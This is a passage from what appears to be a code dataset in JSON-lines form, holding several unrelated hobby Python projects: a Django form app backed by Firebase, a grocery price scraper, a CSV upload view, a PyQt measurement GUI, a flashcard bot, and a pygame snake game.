Modelos de Ficha já cadastradas\n fichaSalvas = db.child(bancoModeloFicha).get()\n listaFicha = criarListaDoBanco(fichaSalvas)\n data['listaFicha'] = listaFicha\n\n return render(request, 'responderFicha/modelosFicha.html', data)\n\n\ndef preenchendoFicha(request, fichaSelec):\n data = {}\n data['SessionUser'] = getSessionUser(request)\n data['context'] = \"\"\n data['ficha'] = fichaSelec\n\n # Bancos\n bancoModeloFicha = \"Templates de Fichas\"\n\n ######### Busca categorias salva por ficha e conta o número de categoria\n BuscaCategBanco = db.child(bancoModeloFicha).child(fichaSelec).child(\"categorias\").get()\n listaCategBanco = criarListaDoBancoKEY(BuscaCategBanco)\n contListaCategBanco = len(\n listaCategBanco) # Categorias são númeradas no banco, para encontrar todas precisa saber quantas tem\n\n ########## Listando categorias\n listaCategoriaSalvaFicha = []\n for ContFor in range(contListaCategBanco):\n categoriaDoBanco = db.child(bancoModeloFicha).child(fichaSelec).child(\"categorias\").child(\n ContFor).get() # Encontra cada categoria da ficha selecionada\n categoriaSalvaFicha = criarListaDoBanco(categoriaDoBanco) # Carrega os dados da categoria\n tituloCategoria = categoriaSalvaFicha[1] # Título categoria\n perguntasFicha = categoriaSalvaFicha[0] # Perguntas da categoria\n\n perguntaDaLista = []\n for per in perguntasFicha:\n perguntaDaLista.append(per)\n listaDePerguntas = []\n for perguntas in perguntaDaLista:\n listaAlternativas = []\n try:\n for alter in perguntas[\"alternativas\"]:\n alternativaFicha = alter[\"tituloAlternativa\"]\n listaAlternativas.append(alternativaFicha)\n except:\n listaAlternativas.append(\"dissertativa\")\n objectPerguntas = Pergunta(perguntas[\"tituloPergunta\"], listaAlternativas, perguntas[\"multiplasRespostas\"])\n listaDePerguntas.append(objectPerguntas)\n objectCategoria = Categoria(tituloCategoria, 1, listaDePerguntas)\n listaCategoriaSalvaFicha.append(objectCategoria)\n\n ############################ Organizando perguntas para enviar ao template ######################################\n listaApenasPerguntas = [] # Lista contendo todas as perguntas, sem nenhum criterio\n listaPergutas = [] # Lista com [[[Cat1],[perguntas e respostas]],[[Cat2], [perguntas e respostas]]]\n for cat in listaCategoriaSalvaFicha:\n juntaInfPerguntas = []\n juntaInfPerguntas.append([cat.get_tituloCategoria()])\n juntPerguntas = []\n for perg in cat.get_objectPerguntas():\n juntPerguntas.append({\"pergunta\": perg.get_tituloPergunta(), \"alternativas\": perg.get_tituloAlternativa(), \"multiplasRespostas\": perg.get_multiplasRespostas})\n listaApenasPerguntas.append(perg.get_tituloPergunta())\n juntaInfPerguntas.append(juntPerguntas)\n #juntaInfPerguntas.append(perg)\n #print(\"AQUI:\", cat)\n listaPergutas.append(juntaInfPerguntas)\n\n data['categoriaSelec'] = listaPergutas\n\n ################################################################ Recuperando informações do form ###################\n if request.method == \"POST\":\n listaPerguntasForm = []\n for perg in listaApenasPerguntas:\n pergunta = perg\n perguntaForm = request.POST.get(pergunta, 'Pergunta não carregada')\n resposta = ('resposta' + perg)\n respostaForm = request.POST.get(resposta, 'Resposta não carregada')\n if len(request.POST.getlist(resposta, 'Resposta não carregada')) > 1:\n respostaForm = request.POST.getlist(resposta, 'Resposta não carregada')\n tituloFicha = 'tituloFicha'\n tituloFichaForm = request.POST.get(tituloFicha, 'Titulo Ficha não carregada')\n tituloCategoriaF = 'tituloCategoria'\n tituloCategoriaForm = request.POST.get(tituloCategoriaF, 'Categoria não carregada')\n\n objectPerguntaPreenchida = Pergunta(perguntaForm, respostaForm)\n listaPerguntasForm.append(objectPerguntaPreenchida)\n\n ##################################################################### Salvando no banco\n contCat = 0\n objectFichaPreenchida = FichaPreenchida(tituloFichaForm, request.session.get('userId'), listaCategoriaSalvaFicha, fichaSelec)\n # Cria a ficha no banco\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).set(objectFichaPreenchida.enviarFichaFirebase())\n # Percorre cada categoria\n for categoriaList in listaCategoriaSalvaFicha:\n idTeste = 0\n objectCategoriaPreenchida = Categoria(categoriaList.get_tituloCategoria(), idTeste, categoriaList.get_objectPerguntas())\n # Salva as categorias\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).update(\n objectFichaPreenchida.updateFichaCategoriaFirebase(categoriaList.get_tituloCategoria(), idTeste,\n contCat))\n contP = 0\n for perg in objectCategoriaPreenchida.get_objectPerguntas(): # Salva as perguntas\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).update(\n objectFichaPreenchida.updateFichaPerguntasFirebase(perg.get_tituloPergunta(),\n perg.get_tituloAlternativa(),\n contP,\n perg.get_multiplasRespostas()))\n contAlt = 0\n for alter in perg.get_tituloAlternativa(): # Salva as alternativas\n if alter == \"dissertativa\":\n for pergForm in listaPerguntasForm:\n if perg.get_tituloPergunta() == pergForm.get_tituloPergunta():\n respostaDissertativa = pergForm.get_tituloAlternativa()\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).child('perguntas').child(contP).update(\n objectFichaPreenchida.updateFichaAlternativasDissertativaFirebase(respostaDissertativa,\n contAlt))\n\n else:\n marcadoComo = identificarAlternativaMarcada(listaPerguntasForm, perg, alter)#\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).child('perguntas').child(contP).update(\n objectFichaPreenchida.updateFichaAlternativasFirebase(alter, contAlt, marcadoComo))\n\n contAlt = contAlt + 1\n\n contP = contP + 1\n\n contCat = contCat + 1\n\n # html = \"

    Pergunta:\" + respostaForm + \"

    \"\n return redirect(pgCampo)\n\n return render(request, 'responderFicha/preencherFicha.html', data)\n\n\ndef excluirFicha(request, fichaSelec):\n db.child(tabelaBancoFicha).child(fichaSelec).remove()\n\n return redirect('url_responderFicha')\n\ndef alterarFicha(request, fichaSelec):\n data = {}\n data['SessionUser'] = getSessionUser(request)\n\n dadosFicha = db.child(tabelaBancoFicha).child(fichaSelec).get().val()\n data['fichaSelec'] = dadosFicha\n\n contListaCategBanco = len(dadosFicha['categorias'])\n\n listaApenasPerguntas = []\n for categorias in dadosFicha['categorias']:\n for perguntas in categorias['perguntas']:\n listaApenasPerguntas.append(perguntas['tituloPergunta'])\n\n if request.method == \"POST\":\n listaPerguntasForm = []\n for perg in listaApenasPerguntas:\n pergunta = perg\n perguntaForm = request.POST.get(pergunta, 'Pergunta não carregada')\n resposta = ('resposta' + perg)\n respostaForm = request.POST.get(resposta, 'Resposta não carregada')\n if len(request.POST.getlist(resposta, 'Resposta não carregada')) > 1:\n respostaForm = request.POST.getlist(resposta, 'Resposta não carregada')\n tituloFicha = 'tituloFicha'\n tituloFichaForm = request.POST.get(tituloFicha, 'Titulo Ficha não carregada')\n tituloCategoriaF = 'tituloCategoria'\n tituloCategoriaForm = request.POST.get(tituloCategoriaF, 'Categoria não carregada')\n\n objectPerguntaPreenchida = Pergunta(perguntaForm, respostaForm)\n listaPerguntasForm.append(objectPerguntaPreenchida)\n\n\n ########## Listando categorias\n listaCategoriaSalvaFicha = []\n for ContFor in range(contListaCategBanco):\n categoriaDoBanco = db.child(tabelaBancoFicha).child(fichaSelec).child(\"categorias\").child(\n ContFor).get() # Encontra cada categoria da ficha selecionada\n categoriaSalvaFicha = criarListaDoBanco(categoriaDoBanco) # Carrega os dados da categoria\n tituloCategoria = categoriaSalvaFicha[1] # Título categoria\n perguntasFicha = categoriaSalvaFicha[0] # Perguntas da categoria\n\n perguntaDaLista = []\n for per in perguntasFicha:\n perguntaDaLista.append(per)\n listaDePerguntas = []\n for perguntas in perguntaDaLista:\n listaAlternativas = []\n try:\n for alter in perguntas[\"alternativas\"]:\n alternativaFicha = alter[\"tituloAlternativa\"]\n listaAlternativas.append(alternativaFicha)\n except:\n listaAlternativas.append(\"dissertativa\")\n objectPerguntas = Pergunta(perguntas[\"tituloPergunta\"], listaAlternativas, perguntas[\"multiplasRespostas\"])\n listaDePerguntas.append(objectPerguntas)\n objectCategoria = Categoria(tituloCategoria, 1, listaDePerguntas)\n listaCategoriaSalvaFicha.append(objectCategoria)\n\n ##################################################################### Salvando no banco\n contCat = 0\n objectFichaPreenchida = FichaPreenchida(tituloFichaForm, request.session.get('userId'),\n listaCategoriaSalvaFicha, fichaSelec)\n # Cria a ficha no banco\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).set(\n objectFichaPreenchida.enviarFichaFirebase(dadosFicha['modeloFicha'])) #### AQUI ESTA MUDANDO O NOME DA FICHA\n\n # Percorre cada categoria\n for categoriaList in listaCategoriaSalvaFicha:\n idTeste = 0\n objectCategoriaPreenchida = Categoria(categoriaList.get_tituloCategoria(), idTeste,\n categoriaList.get_objectPerguntas())\n # Salva as categorias\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).update(\n objectFichaPreenchida.updateFichaCategoriaFirebase(categoriaList.get_tituloCategoria(), idTeste,\n contCat))\n contP = 0\n for perg in objectCategoriaPreenchida.get_objectPerguntas(): # Salva as perguntas\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).update(\n objectFichaPreenchida.updateFichaPerguntasFirebase(perg.get_tituloPergunta(),\n perg.get_tituloAlternativa(),\n contP,\n perg.get_multiplasRespostas()))\n contAlt = 0\n for alter in perg.get_tituloAlternativa(): # Salva as alternativas\n if alter == \"dissertativa\":\n for pergForm in listaPerguntasForm:\n if perg.get_tituloPergunta() == pergForm.get_tituloPergunta():\n respostaDissertativa = pergForm.get_tituloAlternativa()\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).child('perguntas').child(contP).update(\n objectFichaPreenchida.updateFichaAlternativasDissertativaFirebase(respostaDissertativa,\n contAlt))\n\n else:\n marcadoComo = identificarAlternativaMarcada(listaPerguntasForm, perg, alter)#\n db.child(tabelaBancoFicha).child(objectFichaPreenchida.get_tituloFicha()).child(\n 'categorias').child(contCat).child('perguntas').child(contP).update(\n objectFichaPreenchida.updateFichaAlternativasFirebase(alter, contAlt, marcadoComo))\n\n contAlt = contAlt + 1\n\n contP = contP + 1\n\n contCat = contCat + 1\n\n # html = \"

    Pergunta:\" + respostaForm + \"

    \"\n\n return redirect('url_responderFicha')\n\n\n return render(request, 'responderFicha/alterarFicha.html', data)","repo_name":"Renan-Bodom/LabGRis","sub_path":"responderFicha/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18079,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36087240784","text":"\"\"\"Rimi webpage scraper\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport requests\nfrom src.util.cacher import Cacher\n\nfrom src.util.product import ProductInfo\nfrom src.util.provider import Provider\n\n\nclass RimiProvider(Provider):\n \"\"\"Rimi webpage scraper (initialization makes 1 request)\"\"\"\n\n def __init__(self):\n self._products: list[ProductInfo] = []\n self._use_cache = True\n self._cache_file_name = \"rimi_cache.cache\"\n self._base_url = \"https://www.rimi.ee/\"\n self._estore_url = self._base_url + \"epood\"\n self._category_urls = self._get_category_urls()\n self._category_urls_index = 0\n self._page_index = 1\n\n def make_next_request(self) -> None:\n \"\"\"Make the next request\"\"\"\n products = self._get_products_from_category(\n self._category_urls[self._category_urls_index], self._page_index)\n\n if products is None:\n self._category_urls_index += 1\n self._page_index = 1\n return\n\n self._products.extend(products)\n\n self._page_index += 1\n\n def get_products(self) -> list[ProductInfo] | None:\n \"\"\"Return the products\"\"\"\n if self._products:\n if self._use_cache:\n cache = Cacher(self._cache_file_name)\n cache.cache_products(self._products)\n return self._products\n else:\n cache = Cacher(self._cache_file_name)\n try:\n return cache.get_cached_products()\n except Exception:\n return None\n\n def get_progress(self) -> int:\n \"\"\"Return the progress\"\"\"\n return self._category_urls_index * 100 // len(self._category_urls)\n\n def set_use_cache(self, use_cache: bool) -> None:\n \"\"\"Set False if you dont want to use cache (default: True)\"\"\"\n self._use_cache = use_cache\n\n def _get_category_urls(self) -> list[str]:\n \"\"\"Get category urls\"\"\"\n CATEGORY_CLASS_NAME = \"category-menu -second-level js-categories-level-container\"\n\n # CATEGORY_CLASS_NAME > ul > li > a\n html = requests.get(self._estore_url, timeout=10).text\n soup = BeautifulSoup(html, \"html.parser\")\n\n urls = []\n for category in soup.find_all(\"div\", class_=CATEGORY_CLASS_NAME):\n urls.append(self._base_url +\n category.find(\"ul\").find(\"li\").find(\"a\").get(\"href\"))\n\n return urls\n\n def _get_products_from_category(self, category_url: str, page: int) -> list[ProductInfo]:\n \"\"\"Get products from a category\"\"\"\n # page querry for the category page\n PAGE_SIZE = 100\n PRODUCT_CONTAINER_CLASS = \"card__details\"\n PRICE_CONTAINER_CLASS = \"price-tag\"\n UNIT_PRICE_CLASS = \"card__price-per\"\n\n products = []\n\n html = requests.get(\n category_url + f\"?page={page}&pageSize={PAGE_SIZE}\", timeout=10).text\n soup = BeautifulSoup(html, \"html.parser\")\n category = soup.find(\"h1\").text\n product_containers = soup.find_all(\n \"div\", {\"class\": PRODUCT_CONTAINER_CLASS})\n\n if product_containers is None or not product_containers:\n return None\n\n for product in product_containers:\n name = product.find(\"p\").text\n\n price_conatiner = product.find(\n \"div\", {\"class\": PRICE_CONTAINER_CLASS})\n\n if price_conatiner is None:\n continue\n\n # price is in the form of price_main.price_decimal\n price_main = int(price_conatiner.find(\"span\").text)\n price_decimal = int(price_conatiner.find(\"sup\").text)\n price = (price_main * 100 + price_decimal) / 100\n\n # [price, unit]\n unit_price = product.find(\n \"p\", {\"class\": UNIT_PRICE_CLASS}).text.replace(\" \", \"\").replace(\"\\n\", \"\").split(\"€/\")\n\n price_per_unit = float(unit_price[0].replace(\",\", \".\"))\n weight_unit = unit_price[1]\n\n product: ProductInfo = {\n \"name\": name,\n \"price\": price,\n \"price_per_unit\": price_per_unit,\n \"weight_unit\": weight_unit,\n \"category\": category,\n \"store_name\": \"rimi\",\n \"weight\": price / price_per_unit\n }\n\n products.append(product)\n\n return products\n\n def delete_cache(self) -> None:\n \"\"\"Delete the cache file\"\"\"\n Cacher(self._cache_file_name).delete_cache()\n","repo_name":"Rig14/price-scraper-est","sub_path":"src/rimi/rimi.py","file_name":"rimi.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23085566862","text":"import csv\nimport json\n\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\n\n\nimport channels.layers\nfrom asgiref.sync import async_to_sync\n\ndef index(request):\n return render(request, 'chat/index.html')\n\n@csrf_exempt\ndef room(request, room_name):\n print(room_name)\n print(request.FILES[room_name])\n csv_file = request.FILES[room_name]\n decoded_file = csv_file.read().decode('utf-8').splitlines()\n reader = csv.DictReader(decoded_file)\n channel_layer = channels.layers.get_channel_layer()\n total = len(decoded_file)\n count = 0\n for row in reader:\n count += 1\n if count % 50 == 0:\n async_to_sync(channel_layer.group_send)(f'chat_{room_name}', {'type': 'chat_message','message':f'Procesed {count} of {total} '})\n print(row)\n\n async_to_sync(channel_layer.group_send)(f'chat_{room_name}', {'type': 'chat_message','message':'end'})\n\n","repo_name":"nsht/django_channels_quick_start","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1526602209","text":"import sys\nfrom PyQt4 import QtGui, QtCore\nimport math\n\nclass Window(QtGui.QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n self.setGeometry(50, 50, 500, 300)\n self.setWindowTitle(\"Mentor\")\n self.setWindowIcon(QtGui.QIcon('ids.png'))\n self.home()\n self.x_move = 0\n self.y_move = 0\n self.x_move_1 = 0\n self.y_move_2 = 0\n self.x_spacer = 250\n self.x_min = 10\n self.electrod = 100 #in microni\n self.x_calibration = 100\n self.increment = 1800.0\n\n def home(self):\n\n self.showFullScreen()\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n pixmap = QtGui.QPixmap(\"1.jpg\")\n painter.drawPixmap(self.rect(), pixmap)\n color = QtGui.QColor(255, 0, 0)\n pen = QtGui.QPen(color, 3)\n pen.setStyle(QtCore.Qt.DashLine)\n painter.setPen(pen)\n # linie orizontala\n painter.drawLine(0, self.rect().height() / 2 + self.y_move, self.rect().width(), self.rect().height() / 2 + self.y_move)\n\n # linie verticala stanga\n color = QtGui.QColor(0, 0, 255)\n pen = QtGui.QPen(color, 3)\n pen.setStyle(QtCore.Qt.DashLine)\n painter.setPen(pen)\n painter.drawLine(self.rect().width() / 2 + self.x_move - self.x_spacer, 0, self.rect().width() / 2 + self.x_move - self.x_spacer, self.rect().height())\n\n # linie verticala dreapta\n color = QtGui.QColor(0, 0, 255)\n pen = QtGui.QPen(color, 3)\n pen.setStyle(QtCore.Qt.DashLine)\n painter.setPen(pen)\n painter.drawLine(self.rect().width() / 2 + self.x_move_1 + self.x_spacer, 0, self.rect().width() / 2 + self.x_move_1 + self.x_spacer, self.rect().height())\n\n # afisare distanta intre liniile verticale\n painter.setPen(QtGui.QColor(125, 125, 125))\n painter.setFont(QtGui.QFont('Consolas', 30))\n val_afisata = (self.electrod * (self.x_move_1 - self.x_move + 2 * self.x_spacer)) / self.x_calibration #(self.rect().width() / 2 + self.x_move_1 + self.x_spacer) - (self.rect().width() / 2 + self.x_move - self.x_spacer)\n #print(lol)\n painter.drawText(50, 100, u'\\u00D8' + ' ' + str(val_afisata) + ' ' + u'\\u03BCm')\n\n # afisare calcul unghi\n unghi_teta = math.degrees(math.atan(self.increment/(val_afisata / 2)))\n painter.drawText(50, 150, u'\\u2221' + ' ' + str(round(90 - unghi_teta, 2)) + u'\\u00B0' + ', increment de ' + str(self.increment/1000) + ' mm')\n\n def keyPressEvent(self, e):\n k = e.key()\n m = int(e.modifiers())\n\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence('Right'):\n self.x_move += 10\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence(QtCore.Qt.SHIFT + QtCore.Qt.Key_Right):\n self.x_move += 1\n #print(self.x_move)\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence('Left'):\n self.x_move -= 10\n #print(self.x_move)\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence(QtCore.Qt.SHIFT + QtCore.Qt.Key_Left):\n self.x_move -= 1\n if e.key() == QtCore.Qt.Key_Up:\n self.y_move -= 10\n #print(self.y_move)\n if e.key() == QtCore.Qt.Key_Down:\n self.y_move += 10\n #print(self.y_move)\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence('Ctrl+Right'):\n self.x_move_1 += 10\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence(QtCore.Qt.CTRL + QtCore.Qt.SHIFT + QtCore.Qt.Key_Right):\n self.x_move_1 += 1\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence('Ctrl+Left'):\n self.x_move_1 -= 10\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence(QtCore.Qt.CTRL + QtCore.Qt.SHIFT + QtCore.Qt.Key_Left):\n self.x_move_1 -= 1\n if QtGui.QKeySequence(m + k) == QtGui.QKeySequence('Ctrl+N'):\n self.x_move = 0\n self.y_move = 0\n self.x_move_1 = 0\n self.y_move_2 = 0\n self.x_calibration = 100\n if e.key() == QtCore.Qt.Key_C:\n self.showDialogCalibration()\n if e.key() == QtCore.Qt.Key_I:\n self.showDialogIncrement()\n self.update()\n\n def showDialogCalibration(self):\n text, result = QtGui.QInputDialog.getText(self, 'Calibrare camera ', 'Introdu diametrul electrodului:')\n if result == True:\n self.electrod = int(text)\n self.x_calibration = self.x_move_1 - self.x_move + 2 * self.x_spacer\n\n def showDialogIncrement(self):\n text, result = QtGui.QInputDialog.getText(self, 'Increment ', 'Introdu incrementul in mm:')\n if result == True:\n self.increment = float(text) * 1000\n\n def close_application(self):\n #print(\"custom\")\n sys.exit()\n\ndef run():\n app = QtGui.QApplication(sys.argv)\n GUI = Window()\n sys.exit(app.exec_())\n\nrun()","repo_name":"tr0ubl3/PosCam","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17377029171","text":"# _*_ encoding:utf-8 _*_\n__author__ = 'williamcullen'\n__date__ = '2017/8/2 11:33'\nfrom sqlalchemy import Table, Column, Integer, String\n\nfrom config import metadata\n\n# 定义表\nnews = Table('news', metadata,\n Column('id', Integer, primary_key=True),\n Column('title', String(128)),\n Column('text', String(1280)),\n )\n","repo_name":"williamcullen/flaskr-github","sub_path":"flaskr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"467490033","text":"from . import CardLabelRelation, Card, Label\nfrom . import utils\n\n\ndef create(user_id, card_id, label_id, is_reversed=False) -> [CardLabelRelation, bool]:\n card = utils.user_protected_read(Card, user_id, card_id)\n label = utils.user_protected_read(Label, user_id, label_id)\n return CardLabelRelation.get_or_create(\n card=card, label=label,\n is_reversed=is_reversed\n )\n\n\ndef create_by_instances(card: Card, label: Label, is_reversed=False) -> [CardLabelRelation, bool]:\n return CardLabelRelation.get_or_create(\n card=card, label=label,\n is_reversed=is_reversed\n )\n\n\ndef read_one(user_id, label_id, card_id) -> [CardLabelRelation, bool]:\n return create(user_id, card_id, label_id)\n\n\ndef switch_relation(user_id, card_id, label_id) -> [CardLabelRelation, bool]:\n relation_with_flag = create(user_id, card_id, label_id)\n if relation_with_flag[1]:\n return relation_with_flag[0]\n relation_with_flag[0].delete_instance()\n return None\n\n\ndef copy_relation_from_other_label(user_id: int, target_label_id: int, source_label_id: int):\n target_label: Label = utils.user_protected_read(Label, user_id, target_label_id)\n source_label: Label = utils.user_protected_read(Label, user_id, source_label_id)\n source_label_cards = source_label.get_cards()\n for card in source_label_cards:\n create_by_instances(card, target_label)\n\n\ndef delete(user_id, card_id, label_id):\n card = utils.user_protected_read(Card, user_id, card_id)\n label = utils.user_protected_read(Label, user_id, label_id)\n relation = CardLabelRelation.get_or_none(card=card, label=label)\n if not relation:\n raise IndexError\n return relation.delete_instance()\n","repo_name":"KozlovKV/anki-bot","sub_path":"core/CRUD/cardLabelRelation.py","file_name":"cardLabelRelation.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6937989132","text":"import logging\n\nimport pygame\n\nfrom config import Config\nfrom snake import Snake\nfrom game import Game\n\n\nclass Engine:\n \"\"\"\n Описывает состояния и функционал \"игрового движка\".\n Получение ввода от игрока, вывод картинки на экран.\n\n Args:\n config (Config): инстанс конфигурации игры\n\n \"\"\"\n # States\n state_menu, state_game, state_gameover, state_enter_highscore = range(4)\n # Colors\n white = (255, 255, 255)\n black = (0, 0, 0)\n red = (255, 0, 102)\n green = (0, 153, 51)\n blue = (0, 102, 255)\n gray = (102, 102, 153)\n color_top_info_line = (204, 153, 255)\n color_info_line_text = (0, 51, 153)\n color_background = (204, 204, 255)\n\n def __init__(self, config: Config):\n self.__config = config\n self.__state = self.state_menu\n self.__block_size = config['block_size'] # размер одного блока в пикселях\n self.__margin_top = config['margin_top']\n self.__base_speed = config['base_speed']\n\n pygame.init()\n\n self.__game = Game(config['board_width'], config['board_height'], config['player_name'])\n self.__window_width = self.__game.board().width() * self.__block_size\n self.__window_height = self.__margin_top + self.__game.board().height() * self.__block_size\n self.__display = pygame.display.set_mode((self.__window_width, self.__window_height))\n pygame.display.set_caption(config['window_caption'])\n self.__clock = pygame.time.Clock()\n logging.info(f'New game initialized: {config[\"window_caption\"]}, {self.__window_width}x{self.__window_height}')\n\n @staticmethod\n def quit():\n \"\"\"\n Завершает работу библиотеки pygame и программы в целом.\n \"\"\"\n pygame.quit()\n quit()\n\n def draw_frame(self):\n \"\"\"\n Отрисовывает один кадр игры и выводит его на экран.\n Один кадр на один игровой ход. После отрисовки производится задержка, определяющая скорость игры.\n \"\"\"\n font_logo_name = self.__config['font_logo_name']\n font_info_line_name = self.__config['font_info_line_name']\n font_paused_name = self.__config['font_paused_name']\n str_logo = 'SNAKE'\n str_paused = '* PAUSE *'\n str_game_over = 'Game Over!'\n\n self.__display.fill(self.color_background)\n\n # МЕНЮ - show 'logo'\n if self.__state == self.state_menu:\n font_logo = pygame.font.SysFont(font_logo_name, 100)\n surf_logo = font_logo.render(str_logo, True, self.color_info_line_text)\n logo_width, logo_height = font_logo.size(str_logo)\n self.__display.blit(surf_logo, [int((self.__window_width - logo_width) / 2),\n int((self.__window_height - logo_height) / 2)])\n\n # ИГРА или ГЕЙМОВЕР\n if self.__state == self.state_game or self.__state == self.state_gameover:\n # Отрисовываем змейку\n for block in self.__game.board().snake().blocks():\n pygame.draw.rect(self.__display,\n self.red if block.is_head() else self.blue,\n [block.x() * self.__block_size,\n self.__margin_top + block.y() * self.__block_size,\n self.__block_size, self.__block_size])\n\n # Отрисовываем еду\n pygame.draw.rect(self.__display, self.green,\n [self.__game.board().food().x() * self.__block_size,\n self.__margin_top + self.__game.board().food().y() * self.__block_size,\n self.__block_size, self.__block_size])\n\n # Show info line at the top of the window\n # 1) draw rect for top info line\n pygame.draw.rect(self.__display, self.color_top_info_line, [0, 0, self.__window_width, self.__margin_top])\n font_info_line = pygame.font.SysFont(font_info_line_name, 20)\n # 2) level\n str_level = f'LVL {self.__game.level()}'\n surf_level = font_info_line.render(str_level, True, self.color_info_line_text)\n level_width, level_height = font_info_line.size(str_level)\n self.__display.blit(surf_level, [int((self.__window_width / 3 - level_width) / 2),\n int((self.__margin_top - level_height) / 2)])\n # 3) score\n str_score = str(self.__game.score())\n surf_score = font_info_line.render(str_score, True, self.black)\n score_width, score_height = font_info_line.size(str_score)\n self.__display.blit(surf_score, [int((self.__window_width - score_width) / 2),\n int((self.__margin_top - score_height) / 2)])\n # 4) head (x,y)\n str_xy = f'(x:{self.__game.board().snake().head().x()}, y:{self.__game.board().snake().head().y()})'\n surf_xy = font_info_line.render(str_xy, True, self.gray)\n xy_width, xy_height = font_info_line.size(str_xy)\n self.__display.blit(surf_xy, [int(self.__window_width / 3 * 2 + (self.__window_width / 3 - xy_width) / 2),\n int((self.__margin_top - xy_height) / 2)])\n # Если игра на паузе, но не геймовер - выводим надпись \"пауза\" на экране\n if self.__game.is_paused() and not self.__game.is_gameover():\n font_paused = pygame.font.SysFont(font_paused_name, 75)\n surf_paused = font_paused.render(str_paused, True, self.red)\n paused_width, paused_height = font_paused.size(str_paused)\n self.__display.blit(surf_paused, [int((self.__window_width - paused_width) / 2),\n int((self.__window_height - paused_height) / 2)])\n\n # GAMEOVER screen\n if self.__state == self.state_gameover:\n font_logo = pygame.font.SysFont(font_logo_name, 60)\n surf_logo = font_logo.render(str_game_over, True, self.red)\n logo_width, logo_height = font_logo.size(str_game_over)\n self.__display.blit(surf_logo, [int((self.__window_width - logo_width) / 2),\n int((self.__window_height - logo_height) / 2)])\n\n # Вывод на экран + задержка в зависимости от уровня игры\n pygame.display.update()\n self.__clock.tick(self.__base_speed + self.__game.level())\n\n def game_loop(self):\n \"\"\"\n Цикл событий игры. Получаем ввод от игрока, реагируем на него, по результатм отрисовываем очередной кадр.\n По выходу из цикла, игра завершается.\n \"\"\"\n while not self.__game.is_quit():\n for event in pygame.event.get():\n # Реагируем на закрытие окна - завершаем игру\n if event.type == pygame.QUIT:\n self.__game.quit()\n # STATES\n # MENU\n if self.__state == self.state_menu:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n self.__state = self.state_game\n elif event.key == pygame.K_ESCAPE:\n self.__game.quit()\n # GAME OVER\n elif self.__state == self.state_gameover:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n self.__state = self.state_menu\n self.__game.reset()\n elif event.key == pygame.K_ESCAPE:\n self.__game.quit()\n # GAME\n elif self.__state == self.state_game:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT or event.key == pygame.K_d:\n self.__game.board().snake().set_direction(Snake.direction_right)\n elif event.key == pygame.K_DOWN or event.key == pygame.K_s:\n self.__game.board().snake().set_direction(Snake.direction_down)\n elif event.key == pygame.K_LEFT or event.key == pygame.K_a:\n self.__game.board().snake().set_direction(Snake.direction_left)\n elif event.key == pygame.K_UP or event.key == pygame.K_w:\n self.__game.board().snake().set_direction(Snake.direction_up)\n elif event.key == pygame.K_SPACE:\n self.__game.toggle_pause()\n elif event.key == pygame.K_ESCAPE:\n self.__state = self.state_gameover\n self.__game.game_over()\n\n if self.__state == self.state_game:\n self.__game.make_turn()\n if self.__game.is_gameover():\n self.__state = self.state_gameover\n\n self.draw_frame()\n","repo_name":"hazadus/object-snake","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":9636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6969486342","text":"from theblockchainapi import BlockchainAPIResource, Blockchain, BlockchainNetwork\nimport json\n\n# Get an API key pair for free here: https://dashboard.blockchainapi.com/api-keys\nMY_API_KEY_ID = None\nMY_API_SECRET_KEY = None\n\nBLOCKCHAIN = Blockchain.SOLANA\nNETWORK = BlockchainNetwork.SolanaNetwork.MAINNET_BETA\n# NETWORK = BlockchainNetwork.SolanaNetwork.DEVNET\n\n# BLOCKCHAIN = Blockchain.ETHEREUM\n# NETWORK = BlockchainNetwork.EthereumNetwork.MAINNET\n# NETWORK = 